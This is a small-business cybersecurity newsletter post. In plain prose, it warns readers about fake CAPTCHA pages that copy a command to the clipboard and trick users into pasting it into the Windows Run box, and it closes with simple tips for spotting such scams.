🤖Fake CAPTCHAs are dropping malware🔒

You know those annoying puzzles that pop up every now and then when you try to visit a website, or register for something?

The ones that ask you to click on a fire hydrant, or a bus, on a series of photos?

Yeah, those puzzles.

It turns out, crooks are using them to trick you into downloading malware. 

It makes sense:

• They’re annoying

• They’re everywhere

• We’re so used to them we don’t even think about them while we’re clicking away

That’s the perfect mindset to be exploited - with our guards down.

Here’s how they’re doing it, and what to pay attention to:

Not everything is a CAPTCHA

CAPTCHA is short for Completely Automated Public Turing test to tell Computers and Humans Apart. It’s a pretty self explanatory name, as it works as a gatekeeper that allows humans to visit certain pages, while keeping automated bots out. It’s a good method to ensure your website isn’t abused in any way. 

However, with AI coming into play over the last few years, many of the “old-fashioned” CAPTCHAs (like the one in the meme above) started losing their effectiveness. So, tech firms got creative. 

Therefore, we now have: 

• Google’s reCaptcha

• Thorarin’s PlayThru

• NioGuard Networks’ NuCaptcha

… and many others

As a result, it’s hard to tell a legitimate CAPTCHA apart from a scam designed to drop malware. Here’s what crooks came up with:

They first create a fake website where you need to land. That website can be anything, from promising free movies and TV series, to free software, from iPhone giveaways to incredible coupons. That website also comes with a piece of malicious JavaScript code that adds a little piece of information to your clipboard. 

The clipboard is a virtual place where you store things you “copy”, before hitting “paste”.

In other words, by simply visiting a website, you “copied” a command. All the crooks need to do is get you to paste it into your computer.

That’s where the fake CAPTCHA comes in. The site comes with an overlay saying you need to “verify” you’re human. To do that, it asks you to press the Windows button + R (this will open up the Run program. It’s a legitimate Windows program, you can give it a try).

Then, it asks you to press CTRL + V (the “paste” command - this will paste the malicious command into the Run program) and hit Enter.

If you do that, voila - you just told your computer to run malware.

People are falling for it

If it feels like a blatantly obvious attempt at a scam - that’s because IT IS. 

But people are still falling for it. Just look at Reddit:

This is just another example proving my point: 

Whatever you do online, you must always be vigilant. 

If you ever come across a weird-looking CAPTCHa and you’re not sure if it’s legit or not, here’s a quick rule of thumb:

• If it asks you to do things outside your browser (for example, to run a Windows command) - it’s a scam

• If it asks you to download anything - it’s a scam

• If it redirects you to an unknown or unexpected website - it’s a scam

• If it asks you to provide any sort of data - it’s a scam

CAPTCHAs should only be about completing a small puzzle, and that’s it. 

That’s it from me this week. I wish you all happy holidays, and take it easy on the sweets 🙂

• Sead from SmallBiz CyberWiz

P.S.

If you enjoyed this newsletter and appreciate these tips, please share this newsletter with your friends and colleagues, it would help a lot!

Header image credit: LFGDating.com